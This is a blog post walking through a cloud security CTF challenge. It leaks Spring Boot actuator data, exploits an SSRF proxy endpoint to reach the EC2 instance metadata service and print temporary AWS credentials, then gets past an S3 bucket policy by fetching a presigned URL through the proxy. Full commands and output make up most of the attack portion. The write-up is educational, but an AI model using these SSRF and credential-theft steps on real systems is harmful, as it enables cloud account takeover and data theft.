ZyVOP Logo
Content That Connects
SeriesAI NewsWhy ZyVOPJoin Discord
ZyVOP Logo
Content That Connects

Empowering developers and creators with cutting-edge insights, comprehensive tutorials, and innovative solutions for the digital future.

Content

  • Categories
  • Tags
  • Badges
  • Leaderboard
  • Write Article
  • Newsletter

Company

  • About Us
  • Why ZyVOP
  • API Documentation
  • Write for Us
  • Contact

Connect

  • Privacy Policy
  • Terms of Service
  • Cookie Policy
  • DMCA Policy
  • Code of Conduct

© 2026 ZyVOP. Crafted with care for the developer community.

Made with ❤️ by the ZyVOP team
All systems operational
HomeWIZ-2025 Competition - Phase 1 (June)

WIZ-2025 Competition - Phase 1 (June)

I0veD
I0veDcyber security researcher
August 12, 2026
5 min read
WIZ-2025 Competition - Phase 1 (June)
Article

Study address:The Ultimate Cloud Security Championship


introduce

WIZ is a company that everyone is familiar with. It is a cloud native security giant and a palace of cloud research and learning. Every year, a new online cloud CTF competition is created like Cyber ​​Buddha. This year, the competition is held for several months. Naturally, I will not miss any issue. Next, I will study this issue. The theme is:Perimeter Leak

Chinese translation:Peripheral vulnerabilitiesFrom this, we can guess the attack ideas: edge, bypass, and privilege escalation. In fact, this is also the consistent use method of cloud problems.


What we looked at:

Image


Seeing this we can get two more points:

  1. s3→It may be a storage flag, but of course certain credentials must be obtained→Permission elevation

  1. Spring Boot → Spring Boot and cloud, the first thing that comes to mind is the Spring Boot env leak, which contains key tokens and so on. (But before, I wanted to ask a certain expert for advice: "Spring Boot memory leaks are difficult to foresee in actual combat. It is only one in a thousand, but once encountered, it is often extremely harmful.") So friends, you should not let it go when you encounter Spring Boot.


Research

Through the above information, we already have similar attack ideas.

First we understand somethingSpring Boot’s Actuator endpoint(There are many online, click on the bold keywords on the left to search)

Let’s look directly at /actuator/env. The output contains a lot of useless content. We mainly focus on the following ones:

user@monthly-challenge:~$ curl https: //ctf:[email protected]/actuator/env

"java.class.path": {
"value": "/home/ec2-user/spring-boot/target/spring-boot-0.0.1-SNAPSHOT.jar"
},
"user.name": {
"value": "ec2-user"
},
"INVOCATION_ID": {
"value": "cb49fb685ed2497eb60672956106753c",
"origin": "System Environment Property "INVOCATION_ID""
},
"HOME": {
"value": "/home/ec2-user",
"origin": "System Environment Property "HOME""
},
"BUCKET": {
"value": "challenge01-470f711",
"origin": "System Environment Property "BUCKET""
},

Successfully found the S3 address. Visit to see



If the permissions are not enough, it seems we have to findSpring Boot’s Actuator endpointOkay, let’s do a semi-automatic batch search to see what information there is.

/actuator/heapdump → 404

/heapdump → 404

/threaddump → 404

/mappings → 404
/actuator/mappings → The content is right, here are some information that looks useful

"patterns": [
                                        "/actuator/info"
                                    ],

"predicate": "{GET [/actuator/threaddump], produces [text/plain;charset=UTF-8]}",
{
"predicate": "{ [/proxy], params [url]}",
"handler": "challenge.Application#proxy(String)",
"details": {
"handlerMethod": {
"className": "challenge.Application",
"name": "proxy",
"descriptor": "(Ljava/lang/String;)Ljava/lang/String;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [],
"params": [
{
"name": "url",
"negated": false
}
],
"patterns": [
"/proxy"
],
"produces": []
}
}

The proxy interface, parameter url, is obviously an ssrf. We also knew earlier that this application is running on EC2, so we naturally thought of ssrf → instance metadata service.

curl "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/”

HTTP error: 401 Unauthorized

Again, the permissions are not enough. Let’s explore other paths.

curl "https://ctf:[email protected]://169.254.169.254/latest/api/token"
HTTP error: 405 Not Allowed

Subsequently, MCP searched the AWS knowledge base to get the official explanation of the bypass method.

Use the Instance Metadata Service to access instance metadata - Amazon Elastic Compute Cloud

Image

One is version bypass and the other is token utilization.


TOKEN=$(curl -X PUT "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") && 
curl -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    56  100    56    0     0    351      0 --:--:-- --:--:-- --:--:--   352
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

为了方便的话可以把token写入变量:
TOKEN=curl -X PUT "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"


Analyze the information again
iam/ user configuration information (after curl access, it is found that there is security-credentials authentication)

identity-credentials/ authentication

Get certification separately

curl -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

challenge01-5592368

curl -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368"
{
"Code" : "Success",
"LastUpdated" : "2025-07-02T13:38:17Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARK7LBOHXLKWZ7WTF",
"SecretAccessKey" : "7tqURWdkmfXW2W7mK6IbKB5mu/sAmMXfokuGoaWH",
"Token" : "IQoJb3JpZ2luX2VjEPb//////////wEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr+VxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI+Pqf9R0iq21EakTDZMqwQUI7///////////ARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO+FRmP7GrJtvQKRphYddMjXSRtLkbNYG+2drmhmhqCvEjc+fz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB/WqTMREyijnkOhmvA/7WyYdtWBAF5OcJ+K6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC/cUQr013Tn/yLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq/4rab+QvQaDe7z0VmF+XIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f+sUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj+HbxvJaKfDkHdD64cwWMvP/5LOeMqtGsKbLY+4Cqs78aMA/xu3cBDfTtcN38o8Ui8473GQl+/IMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR+Y37GNg24B27jJbRo8LIjP7ReFRrPul4eN/qjI8LTGk6t+cQmEdNZMlcYJysPpc5nyeNf42f4P6/lg858YSsuqDMEjg/r5O0KenO/Bq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW/SONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf+Uuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl+Bh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx+M/v1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL/Wne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me+yM7ifWGbga25nmTkCg6d1+zpfAWqj/Jtb4=",
"Expiration" : "2025-07-02T19:40:17Z"

url -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:88sPVWyC2e01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
{
"Code" : "Success",
"LastUpdated" : "2025-07-02T13:39:19Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARK7LBOHXB3CPPMKE",
"SecretAccessKey" : "BNlxMBEkWgl1B5jiIvgAV9PVM9RdzA22esYgxnnV",
"Token" : "IQoJb3JpZ2luX2VjEPb//////////wEaCXVzLWVhc3QtMSJGMEQCIGmgLc6imtoUFec0nsssCY0TESJZGu0g/yKRiEf38tn4AiAjYvIovN8WSAdD1/4rUsMCrkkRnXGzWcCQ6iWK2c3nNirPBAjv//////////8BEAAaDDA5MjI5Nzg1MTM3NCIMbH3XEXTFgpVAxic7KqMEYk7GNoovjR7LoF3lP/jJRjnpvOT0Rbxs2cuOo3wIYecgbQJdGs9F3BHswYH1ygVmVHwbVZXjekfdaaVbPacvCa2M6rfc1lR9H5ycrP5IB0mRi7QQWSvOKbp+haRF9Rtd+12EbWZFposn+rQPxKgZRChXxE9mVfOEWxkSUAjEuY7nnXpGE0x5tMvilB/8UfHLBy6WLvBfjZVpe6zuhDgfJQix12a2WxWfOyhaIqjiNhbdthigR6sjgD7z8eh3YMDiSVOmUeARh4vWblnRyfwH5Znyyl4okRZnxpC8U8i7dI8zDmDf18ARbXNB6Z1wUSboiQKlZZz93diGWsMyj03tmY/9vv4WtQ4XSXrlLQSzkuOnG98doJtIZ6YH0J3oSH1XOR14XxWd7RJ/jenb0yd/vgENqm8TUn9ZqBHdTwAtNN8jDgk2VEG3zBuCw2HXNfL8wc6KogPxoBkXVNz7DQeYdJA+BC9+LZsdqx1V+zMV+I07dXSVHhyOqPW7xuRNWWDlcvSnlBm+k4fIsyQbjlaTknZgJK+ImYhHA06mVGf6ykf6TOdjuFlIsxMY4Ej0psTLGIIxLp0AKDfzJAvaQdpQCVYZOTYnRWdi+BG41Q49iPiEn6Y6PR4GkTA5RXEdAcohwsbRx4bTLu/Ww0I1wF0WRlNIp8680HKUtnKi3OkDHr2i0x4/yEocGi5Z/r25ToHXf5itBSf+QZ9Cts4QirTmBGGWWzDt7JTDBjqUAv358q/q8XvlRsh2NU1JYG1LVxJWxZ/lsUKp8RHwNc/hV2V3pj3REiHkdlMY3ADJLplBwffWcJBD1WGhyakHBA5eX8bQRmoN7Ppr37wJfpko1pgpapQX2HbvS5G5Rjz0P0Ge7Iq+eVxx6weh6KzesI48xl1YkbSlZb0c8Y64EEHge6D//DDzM7QUlPhdeerUXhx0XFpqCuCwimY92miTGoDDa+7u1tsu6MCOybicJWc3bNF7PAwlAfgOPY6oHCdTM2BnxPrJY2H5OuHHRT0amgRInOmlsiaWO4SYVomiRe2wlDHBLruDHlG0h/I8G4Dl1PSPwnN7bcy3R60r9O+PRUpeN+zSSJKUnTKBVyGEMt5RtGJ6oA==",
"Expiration" : "2025-07-02T20:08:18Z"

The following two token values ​​are also different.

/identity-credentials/ec2/security-credentials/ec2-instance

/iam/security-credentials/challenge01-5592368

aws config authenticates the token. Let’s check the difference in permissions between them.

export AWS_ACCESS_KEY_ID=ASIARK7LBOHXLKWZ7WTF
export AWS_SECRET_ACCESS_KEY=7tqURWdkmfXW2W7mK6IbKB5mu/sAmMXfokuGoaWH
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEPb... (这里使用第一个完整的 Token)

aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXDP2J2E3DV:i-0bfc4291dd0acd279",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279"
}

没有查看自身权限的权限:
aws iam list-attached-role-policies --role-name challenge01-5592368

An error occurred (AccessDenied) when calling the ListAttachedRolePolicies operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: iam:ListAttachedRolePolicies on resource: role challenge01-5592368 because no identity-based policy allows the iam:ListAttachedRolePolicies action

Later I found out that ec2-instance is actually our current user and no further testing is needed.
We directly use the token of challenge01-5592368-

aws s3 ls s3://challenge01-470f711 --recursive

2025-06-18 11:15:24 29 hello.txt
2025-06-16 16:01:49 51 private/flag.txt

There is a flag, but the test found that the permissions are not available:

aws s3 cp s3://challenge01-470f711/private/flag.txt -

download failed: s3://challenge01-470f711/private/flag.txt to - An error occurred (403) when calling the HeadObject operation: Forbidden

Check out the bucket policy:

aws s3api get-bucket-policy --bucket challenge01-470f711 
  --query "Policy" --output text | jq .

Image

The core functions of this strategy are:Protectprivate/folder. itrejectAll frompublic internetorUntrusted network locationrequest to download the files in this folder. Only through oneSpecific, internal AWS network channel (VPC Endpoint)Access is only allowed if the request is made.

what can we do nextThe next task is:Find a way to make my AWS requestEmitted from this specific VPC endpoint. This usually means I need:

  1. Locate an EC2 instance within the VPC associated with this VPC endpoint.

  1. Find a way to execute the command on that EC2 instance. (to satisfy)

  1. Or find another way to make requests from within the VPC (for example, a Lambda function). (No question given)

aws --profile c1 ec2 describe-vpc-endpoints                                          

An error occurred (UnauthorizedOperation) when calling the DescribeVpcEndpoints operation: You are not authorized to perform this operation. User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: ec2:DescribeVpcEndpoints because no identity-based policy allows the ec2:DescribeVpcEndpoints action

Still don’t have permission, let’s statistically analyze the information we may use:

  1. All external network requests seem to have to go through a proxy server:https://ctf:[email protected]/proxy

  1. The VPC where the EC2 instance is located has a "VPC Endpoint" connected to S3

It seemshttps://ctf:[email protected]/proxy vpc, combining these two points, we have to find a way to use it through curl.https://ctf:[email protected]/proxyForward to connect to s3


SummarizeStrategy:

  1. Since it is not possible to directly access thecurlS3 address, then a presigned URL (Presigned URL) is generated.

  1. This pre-signed URL contains temporary access credentials.

  1. Then, through that proxycurlThis pre-signed URL.

  1. becausecurlThe command is issued from the EC2 instance, so network traffic should be intelligently routed through the VPC endpoint to S3.


aws s3 presign s3://challenge01-470f711/private/flag.txt 
https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXLKWZ7WTF%2F20250702%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250702T145857Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEPb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr%2BVxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI%2BPqf9R0iq21EakTDZMqwQUI7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO%2BFRmP7GrJtvQKRphYddMjXSRtLkbNYG%2B2drmhmhqCvEjc%2Bfz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB%2FWqTMREyijnkOhmvA%2F7WyYdtWBAF5OcJ%2BK6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC%2FcUQr013Tn%2FyLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq%2F4rab%2BQvQaDe7z0VmF%2BXIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f%2BsUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj%2BHbxvJaKfDkHdD64cwWMvP%2F5LOeMqtGsKbLY%2B4Cqs78aMA%2Fxu3cBDfTtcN38o8Ui8473GQl%2B%2FIMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR%2BY37GNg24B27jJbRo8LIjP7ReFRrPul4eN%2FqjI8LTGk6t%2BcQmEdNZMlcYJysPpc5nyeNf42f4P6%2Flg858YSsuqDMEjg%2Fr5O0KenO%2FBq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW%2FSONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf%2BUuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl%2BBh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx%2BM%2Fv1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL%2FWne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me%2ByM7ifWGbga25nmTkCg6d1%2BzpfAWqj%2FJtb4%3D&X-Amz-Signature=3390210270e1988d036afc766e6717222f99867a85ee41a121f8a4511cebba1d

Try querying it from a proxy server

curl "https://ctf:[email protected]/proxy?url=https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXLKWZ7WTF%2F20250702%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250702T145857Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEPb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr%2BVxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI%2BPqf9R0iq21EakTDZMqwQUI7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO%2BFRmP7GrJtvQKRphYddMjXSRtLkbNYG%2B2drmhmhqCvEjc%2Bfz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB%2FWqTMREyijnkOhmvA%2F7WyYdtWBAF5OcJ%2BK6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC%2FcUQr013Tn%2FyLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq%2F4rab%2BQvQaDe7z0VmF%2BXIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f%2BsUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj%2BHbxvJaKfDkHdD64cwWMvP%2F5LOeMqtGsKbLY%2B4Cqs78aMA%2Fxu3cBDfTtcN38o8Ui8473GQl%2B%2FIMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR%2BY37GNg24B27jJbRo8LIjP7ReFRrPul4eN%2FqjI8LTGk6t%2BcQmEdNZMlcYJysPpc5nyeNf42f4P6%2Flg858YSsuqDMEjg%2Fr5O0KenO%2FBq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW%2FSONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf%2BUuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl%2BBh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx%2BM%2Fv1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL%2FWne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me%2ByM7ifWGbga25nmTkCg6d1%2BzpfAWqj%2FJtb4%3D&X-Amz-Signature=3390210270e1988d036afc766e6717222f99867a85ee41a121f8a4511cebba1d"

HTTP error: 400 Bad Request

URL encoding problem, you need toInner URL(fromhttps://starting with the entire S3 address) to fully URL encode

curl "https://ctf:[email protected]/proxy?url=https%3A%2F%2Fchallenge01-470f711.s3.amazonaws.com%2Fprivate%2Fflag.txt%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DASIARK7LBOHXLKWZ7WTF%252F20250702%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20250702T145857Z%26X-Amz-Expires%3D3600%26X-Amz-SignedHeaders%3Dhost%26X-Amz-Security-Token%3DIQoJb3JpZ2luX2VjEPb%252F%252F%252F%252F%252F%252F%252F%252F%252F%252FwEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr%252BVxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI%252BPqf9R0iq21EakTDZMqwQUI7%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252FARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO%252BFRmP7GrJtvQKRphYddMjXSRtLkbNYG%252B2drmhmhqCvEjc%252Bfz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB%252FWqTMREyijnkOhmvA%252F7WyYdtWBAF5OcJ%252BK6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC%252FcUQr013Tn%252FyLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq%252F4rab%252BQvQaDe7z0VmF%252BXIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f%252BsUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj%252BHbxvJaKfDkHdD64cwWMvP%252F5LOeMqtGsKbLY%252B4Cqs78aMA%252Fxu3cBDfTtcN38o8Ui8473GQl%252B%252FIMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR%252BY37GNg24B27jJbRo8LIjP7ReFRrPul4eN%252FqjI8LTGk6t%252BcQmEdNZMlcYJysPpc5nyeNf42f4P6%252Flg858YSsuqDMEjg%252Fr5O0KenO%252FBq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW%252FSONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf%252BUuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl%252BBh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx%252BM%252Fv1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL%252FWne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me%252ByM7ifWGbga25nmTkCg6d1%252BzpfAWqj%252FJtb4%253D%26X-Amz-Signature%3D3390210270e1988d036afc766e6717222f99867a85ee41a121f8a4511cebba1d"
The flag is: WIZ_CTF_Presigned_Urls_xxxxx

OK flag, guys, go and collect it.







Expand additional knowledge:

AWS S3 signing method

AWS S3 uses a signature mechanism to verify the legitimacy of API requests and pre-signed URLs, ensuring that only authorized users can access the bucket and its objects. There are mainly three signature methods:Signature Version 2 (SigV2)、Signature Version 4 (SigV4)andSignature Version 4A (SigV4A). SigV2 is an older mechanism based on the HMAC-SHA1 algorithm, which is simple but less secure. It has been phased out and is only used in older systems or compatibility scenarios. SigV4 is a standard recommended by AWS. It uses the HMAC-SHA256 algorithm, supports all regions and services, and contains information such as timestamps and regions to prevent replay attacks. It is often used in modern API requests and pre-signed URLs (such as the scenario of accessing S3 through a proxy in this article). SigV4A is an extension of SigV4 and is designed for multi-region access (such as S3 Multi-Region Access Points). It uses the AWS4-ECDSA-P256-SHA256 or AWS4-HMAC-SHA256 algorithm and is suitable for cross-region replication and other scenarios, but the support range is narrow. SigV4 has become the mainstream signature method for AWS S3 due to its high security and wide applicability.



I0veD

I0veD

cyber security researcher

Cloud Native & AI Sec Researcher Red Team | BAS | K8s | Evasion 20+ CVEs | CNVD/CNNVD Contributor 🛡️ AI-Driven Blue Team 👇 Works

Comments (0)

Login to post a comment.